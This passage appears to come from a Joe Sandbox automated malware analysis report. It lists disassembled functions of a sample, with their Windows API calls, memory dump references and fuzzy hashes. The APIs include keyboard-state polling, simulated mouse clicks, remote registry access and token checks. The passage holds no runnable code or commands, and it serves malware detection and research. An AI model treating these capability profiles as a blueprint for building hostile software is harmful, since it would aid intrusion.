                                                                            • Opcode Fuzzy Hash: 5c8b352abf8ef204189e1e035ea23c8e7abb3724c0cf9fec1165dced8aae9cbe
                                                                            • Instruction Fuzzy Hash: 34112A3492012DDFCF44EF94E9914AEB7B8FF29344B1044AAD81567291EB366D2ACF50
                                                                            Function 002EF23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 002EF2F0
                                                                            • GetProcessIoCounters.KERNEL32(00000000,?), ref: 002EF320
                                                                            • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 002EF453
                                                                            • CloseHandle.KERNEL32(?), ref: 002EF4D4
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                            • String ID:
                                                                            • API String ID: 2364364464-0
                                                                            • Opcode ID: e38e7381aceb63ac94c7153963027b9329ccd953b3999e1faa021644461ac94c
                                                                            • Instruction ID: 9dcd5028e4d1c7c7da6f0cd932baea3ed2bc3ef10ab2415247f87744487a3b6f
                                                                            • Opcode Fuzzy Hash: e38e7381aceb63ac94c7153963027b9329ccd953b3999e1faa021644461ac94c
                                                                            • Instruction Fuzzy Hash: 478190716203019FD721EF29D882F2AB7E5AF48710F54891DFA99DB2D2D7B0AC108F91
                                                                            Function 002F0697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
                                                                              • Part of subcall function 002F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,002F040D,?,?), ref: 002F1491
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 002F075D
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 002F079C
                                                                            • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 002F07E3
                                                                            • RegCloseKey.ADVAPI32(?,?), ref: 002F080F
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 002F081C
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                                            • String ID:
                                                                            • API String ID: 3440857362-0
                                                                            • Opcode ID: d926ee40dbac904dca2ecb72bb450a30943c5734cf077031fcfe7486384053f4
                                                                            • Instruction ID: 21bd5097af9fb731eed060368277d48296a3446f3ae393cd4873eba3f2e5bc35
                                                                            • Opcode Fuzzy Hash: d926ee40dbac904dca2ecb72bb450a30943c5734cf077031fcfe7486384053f4
                                                                            • Instruction Fuzzy Hash: 34515B71228209AFD704EF64C891F7AF7E9AF84344F04892DF59987292DB70E925CF52
                                                                            Function 002DEBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 002DEC62
                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 002DEC8B
                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 002DECCA
                                                                              • Part of subcall function 00274D37: __itow.LIBCMT ref: 00274D62
                                                                              • Part of subcall function 00274D37: __swprintf.LIBCMT ref: 00274DAC
                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 002DECEF
                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 002DECF7
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1389676194-0
                                                                            • Opcode ID: 6f49477980dbc2d356d6f02ddb32e1f091212da02be6c81bd1d9c17866b9f10e
                                                                            • Instruction ID: c19001d1333854e0959efd18f760305effcd526b48df084fce5e298f8d734cb4
                                                                            • Opcode Fuzzy Hash: 6f49477980dbc2d356d6f02ddb32e1f091212da02be6c81bd1d9c17866b9f10e
                                                                            • Instruction Fuzzy Hash: C4512835A10105DFCF15EF64C985AAEBBF9EF09314F148099E849AB3A1CB31AD61DF50
                                                                            Function 002FA67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 18929ae1354319df09d02563e0e057f2e0cbf185a5001c3eabf00a5d15cef755
                                                                            • Instruction ID: 41b2e32c0a7b7fc5add934f40851cab89bb993b85d3fcc0ff210ee60988c4fd9
                                                                            • Opcode Fuzzy Hash: 18929ae1354319df09d02563e0e057f2e0cbf185a5001c3eabf00a5d15cef755
                                                                            • Instruction Fuzzy Hash: D641E2B592410DAFD724AF28CC84FBDFBB8EB09390F140175EA1AA72D1C770AD61DA51
                                                                            Function 00272714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCursorPos.USER32(?), ref: 00272727
                                                                            • ScreenToClient.USER32(003377B0,?), ref: 00272744
                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00272769
                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00272777
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: aa7be891d671bd29207cf5ad9362e32b43e816476b35e009f6d32811756f0404
                                                                            • Instruction ID: 4a6eb781bed4e99c934a23a9405ef5888b9d528f2bffe3933f3b503ae78ddc09
                                                                            • Opcode Fuzzy Hash: aa7be891d671bd29207cf5ad9362e32b43e816476b35e009f6d32811756f0404
                                                                            • Instruction Fuzzy Hash: 6B415B3552410AFBDF199F68C944AF9FB74FB06364F20835AF82892290CB30A964DF91
                                                                            Function 002C95D7 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 002C95E8
                                                                            • PostMessageW.USER32(?,00000201,00000001), ref: 002C9692
                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 002C969A
                                                                            • PostMessageW.USER32(?,00000202,00000000), ref: 002C96A8
                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 002C96B0
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            • Opcode ID: eebdbf4fcea0e40ef3445788797616f6fd91c10068e3fcba6e8b3f30d7b00c39
                                                                            • Instruction ID: 45779e1dda0c743cfc4caab0f1f50dd37c894fa1045c683a41ac68e1d7e8ad06
                                                                            • Opcode Fuzzy Hash: eebdbf4fcea0e40ef3445788797616f6fd91c10068e3fcba6e8b3f30d7b00c39
                                                                            • Instruction Fuzzy Hash: AD31CC7190021AEFDB18CF68D94CF9E7BB9FB44315F204229F924AB2D0C3B09964DB90
                                                                            Function 002FB7BD Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 002729E2: GetWindowLongW.USER32(?,000000EB), ref: 002729F3
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 002FB804
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 002FB829
                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 002FB841
                                                                            • GetSystemMetrics.USER32(00000004), ref: 002FB86A
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,002E155C,00000000), ref: 002FB888
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 2294984445-0
                                                                            • Opcode ID: ed7040b4e288da3d6fc2b53b0a2677178583c69fbdafd1b7110dd0615415ed17
                                                                            • Instruction ID: 30deaf03509b3f45b75dda3ab0cd3c4cd39ac551301876645ddb9f9d50814d41
                                                                            • Opcode Fuzzy Hash: ed7040b4e288da3d6fc2b53b0a2677178583c69fbdafd1b7110dd0615415ed17
                                                                            • Instruction Fuzzy Hash: 7521967192421AEFCB269F39CC08B75B798FB457A1F144739FA25D65D0D7309820CB80
                                                                            Function 002E6138 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 002E6159
                                                                            • GetForegroundWindow.USER32 ref: 002E6170
                                                                            • GetDC.USER32(00000000), ref: 002E61AC
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 002E61B8
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 002E61F3
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: 5e4a30fdaf58f1605736a486fd70a3ef2692344bd75f8a50cf13f51700f36e43
                                                                            • Instruction ID: 836529f8c256b10cc7bb936c9a97fd07729e1e120fd88327947ce0d2bbdca687
                                                                            • Opcode Fuzzy Hash: 5e4a30fdaf58f1605736a486fd70a3ef2692344bd75f8a50cf13f51700f36e43
                                                                            • Instruction Fuzzy Hash: E821A475A11604EFD714EF65DD88A6AB7F9EF48350F04846AE84A97352CA70AC10CF90
                                                                            Function 002716CF Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00271729
                                                                            • SelectObject.GDI32(?,00000000), ref: 00271738
                                                                            • BeginPath.GDI32(?), ref: 0027174F
                                                                            • SelectObject.GDI32(?,00000000), ref: 00271778
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 11ccbdcb8e3deae77b03ab4c44a5ae985d3c09e10c87bd767fb6a1d3f46c2e59
                                                                            • Instruction ID: 011f2e5f4ddc5fb8e4610daea5beb30387d45e19676da5901d970600ac6e92e6
                                                                            • Opcode Fuzzy Hash: 11ccbdcb8e3deae77b03ab4c44a5ae985d3c09e10c87bd767fb6a1d3f46c2e59
                                                                            • Instruction Fuzzy Hash: 4D21C870425219EFDB269F28DC897A97BFCFF00311F148216F9199A1A0D77099B5CF90
                                                                            Function 002CC837 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: 984e96a6f9431cccf23e9097237f22cabbc392ce77277b9c62aacddc22754b2a
                                                                            • Instruction ID: c1e48dd0f377479c5bbb18446de3f0af51508fd09d10ea59b70a4d2d582dc3ad
                                                                            • Opcode Fuzzy Hash: 984e96a6f9431cccf23e9097237f22cabbc392ce77277b9c62aacddc22754b2a
                                                                            • Instruction Fuzzy Hash: 8A01F573A651063BE603A6119C92FFB731C9E20384F24432DFE0A96381F7A0DE3086E0
                                                                            Function 002D504E Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 002D5075
                                                                            • __beginthreadex.LIBCMT ref: 002D5093
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 002D50A8
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 002D50BE
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 002D50C5
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                            • String ID:
                                                                            • API String ID: 3824534824-0
                                                                            • Opcode ID: 22c46943f6979f18cccbad0c155537e08eb33cf90fd857698aca58cb10020971
                                                                            • Instruction ID: e80f4122769bd7171d8d351c4b8f023550e9624c301b55453ad17aa6e24ffe12
                                                                            • Opcode Fuzzy Hash: 22c46943f6979f18cccbad0c155537e08eb33cf90fd857698aca58cb10020971
                                                                            • Instruction Fuzzy Hash: 061104B6918618BBCB169FA89C48B9B7BACEB49321F14425BF814D3350D6B28D5487F0
                                                                            Function 002C8E20 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 002C8E3C
                                                                            • GetLastError.KERNEL32(?,002C8900,?,?,?), ref: 002C8E46
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,002C8900,?,?,?), ref: 002C8E55
                                                                            • HeapAlloc.KERNEL32(00000000,?,002C8900,?,?,?), ref: 002C8E5C
                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 002C8E73
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 842720411-0
                                                                            • Opcode ID: bf6c04082af03c2a8efab5b8b00fe2dc5348f25d13b6e91d4593f307efe4dda3
                                                                            • Instruction ID: d3ac1464474faf4886054c77b1cde06fb9d2c9ab8d8b66eba96a7e55494f432c
                                                                            • Opcode Fuzzy Hash: bf6c04082af03c2a8efab5b8b00fe2dc5348f25d13b6e91d4593f307efe4dda3
                                                                            • Instruction Fuzzy Hash: 8A018174211209BFDB254FA9DC58E6B7FBDEF89355F10466EF849C2220DB329C10CA60
                                                                            Function 002D57FF Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002D581B
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002D5829
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 002D5831
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 002D583B
                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 002D5877
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: facc84ce0ed7a598704655f00ebdae896b15ee80a2a59ed0829ecd665f23b772
                                                                            • Instruction ID: 028275aacbd244f36cbe6af26c226d610f2040592111cfcb8fea7ab6234fa189
                                                                            • Opcode Fuzzy Hash: facc84ce0ed7a598704655f00ebdae896b15ee80a2a59ed0829ecd665f23b772
                                                                            • Instruction Fuzzy Hash: BB015735C12A2DDBDF089FE4D858AEDBBBCBB08711F004557E402F2240CBB099A4DBA1
                                                                            Function 002C8CC7 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 002C8CDE
                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 002C8CE8
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 002C8CF7
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 002C8CFE
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 002C8D14
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 4b7cdcf3af72ea2fe7ba40b9460f45ffc97d198e60fab0f25495b6e666067d59
                                                                            • Instruction ID: 099cfaa636e9f8f02719c27fe56fb7976fc174d7e56159174c8fbba00922da51
                                                                            • Opcode Fuzzy Hash: 4b7cdcf3af72ea2fe7ba40b9460f45ffc97d198e60fab0f25495b6e666067d59
                                                                            • Instruction Fuzzy Hash: 73F0AF34211205AFEB160FB49C88F6B3BACEF49754F10812AF905C2190CA609C10DB60
                                                                            Function 002C8D28 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 002C8D3F
                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D49
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D58
                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D5F
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 002C8D75
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                            • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                            • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
